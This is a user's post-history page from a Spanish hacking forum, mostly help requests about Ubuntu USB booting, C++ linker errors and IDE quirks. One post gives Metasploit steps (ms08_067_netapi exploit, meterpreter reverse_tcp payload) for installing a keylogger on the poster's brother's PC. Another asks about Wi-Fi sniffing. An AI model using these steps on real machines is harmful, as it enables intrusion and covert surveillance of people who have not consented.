elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: [1]
1  Sistemas Operativos / GNU/Linux / Problema al intentar instalar ubuntu 11.10 en: 17 Diciembre 2011, 04:44 am
Hola que tal, tengo el siguiente problema, al intentar instalar ubuntu 11.10 desde usb o desde dvd boteo con la respectiva unidad y la pantalla queda asi:

************************************************** ***************
SYSLINUX 4.04 EDD 2011-04-18 Copyright (C) 1994-2011 H. Peter Anvin et a
_

************************************************** ***************

con un "_" titilando pero la pc completamente congelada la unica forma de salir es forzando el apagado desde el boton... Aclaro que yo ya habia intalado ubuntu de esta forma pero tuve que formatear y volver al primer SO(windows7) porque necesito el Dreamwever y el photoshop para diseño web... pero ahora intento instalar nuevamente ubuntu junto con windows 7 y no puedo.

El usb lo cree desde la aplicacion de ubuntu Universal-USB-Installer-1.8.7.3 y el dvd con imgburn con los dos sucede el mismo problema hay alguna solucion? el dvd de windows puedo bootearlo normalmente pero el de ubuntu no :/ nose cual puede ser el problema y no encuentro solucion en internet , algunos decian que con unebooting se solucionaba pero la verdad es que fue peor ya que se quedaba la pantalla en negro

notebook:

pavilion dv4-2140 us

4gb de ram

turion x2

Desde ya muchas gracias =)

PD: El usb lo probe en otra pc y si funciona es solamente en la mia no se cual pueda ser el problema
2  Informática / Software / Problema booteo usb en: 14 Diciembre 2011, 05:54 am
Hola que tal, bueno mi problema es que no puedo bootear desde usb pero hace no mucho si podia y nose cual es la causa de que ahora no.. tengo la opcion de bootear desde usb en la bios pero no pasa nada cuando tengo el usb puesto, y para verificar si lo reconocia entre al menu de booteo al iniciar con F9 y no me aparece la opcion de ubs solamente me aparece cd/dvd y HDD nose porque pase esto, estoy intentando instalar ubuntu desde usb como ya dije ya lo habia hecho antes en esta misma pc (hp pavilion dv4-2140us) pero ahora no puedo, por favor necesito ayuda si alguien conoce la solucion a esto...

cabe aclarar que el probe bootear el usb desde otra pc y me deja nose cual sea el problema con esta :/

PD: el usb de arranque con el instalador lo cree con universal usb installer para instalar ubuntu con usb

desde ya muchas gracias....
3  Seguridad Informática / Bugs y Exploits / Exploit+keylogger problema con el puerto? en: 14 Junio 2011, 05:05 am
Hola antes que nada disculpen mi ignorancia bueno aclarado eso les digo el motivo del post es que intento lazar un exploit para instalar keylogger en la pc de mi hermano para ver como se hace lo que hago es lo siguiente:

    booteo con el live cd de backtrack 5

  • ya en el sist operativo inicio el metasploiter

  • una vez cargado pongo use explit/windows/smb/ms08_067_netapi

    • luego pongo payload windows/meterpreter/reverse_tcp

    • ya con eso definido pongo la ip a atacar con el comando set rhost xxx.xxx.xxx.xxx

      • despues mi ip con lhost
      hasta ahi todo perfecto pongo show options y me sale todo en orden pero mi problema esta aca.

      cuando pongo exploit me pone handler no me acuerdo que mas

      pero despues me pone elapsed time o como que se supero el tiempo de espera y entre parentesis me pone la ip atacante ej (199.888.4.4:445) el puerto es el mismo que me aparece a mi ...

      un dato no menor es que cuando paso el nmap a esa direccion de ip el puerto 445 no esta abierto tiene esto algo que ver? por favor necesito una solucion :D

      desde ya muchas gracias :D


      PD: uso backtrack 5  :)
4  Seguridad Informática / Wireless en Windows / sniffear una red con atheros ar9285 802.11b/g/n en: 11 Junio 2011, 04:25 am
Hola que tal bueno la pregunta es simple y disculpen si no iba aca es si puedo sniffear esa placa de red y si es posible donde encuentro los drivers para poder hacer funcionar el Airodump.exe? bueno desde ya muchas gracias y disculpen mi ignorancia

PD: mi SO es windows 7 ultimate 32 bits, en caso de que haya un mejor programa para sniffear con esa placa o con el SO por favor haganmelo saber :D
5  Programación / Programación C/C++ / Problema compilacion con dev-c++ en: 1 Junio 2011, 05:59 am
Hola que tal? bueno mi problema me esta rompiendo la cabeza porque busco por todos lados y no encuentro solucion, el problema es que uso dev-cpp como IDE para compilar programas que hago en c++ el problema es que no me compila me da un error que la verdad no reconozco esto es lo qeu dice el log de error:

  [Linker error] undefined reference to `__dyn_tls_init_callback'
  [Linker error] undefined reference to `__cpu_features_init'
  ld returned 1 exit status
 C:\Dev-Cpp\Makefile.win [Build Error]  [Proyecto2.exe] Error 1

por favor una solucion  :-\ :-\
6  Programación / Java / JDK para win32? [ayuda] en: 26 Mayo 2011, 04:07 am
Creo este tema para preguntarles si existe el Java SE Development Kit (JDK) 6 update 25 para windows 7 32 bits porque en la pagina oficial solo aparece para win de 64 bits :/
por favor ayuda 

desde ya muchas gracias   ;D ;D
7  Programación / Programación C/C++ / Problema con comillas en Geany en: 24 Mayo 2011, 04:22 am
Bueno el tema parece tonto... el IDE que uso es geany me parece bueno,, el problema es que no logro poner comillas ( mi teclado esta en ingles para poder tener los simbolos mayor y menor, pero esto no es problema porque fuera del programa las comillas las puedo hacer aunque tenga el teclado en ingles con shift+la tecla contigua al enter) y se me hace dificil aprender a programar sin tener comillas por favor si alguien sabe la solucion o algo que pueda ayudarme :( seria de mucha ayuda :)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines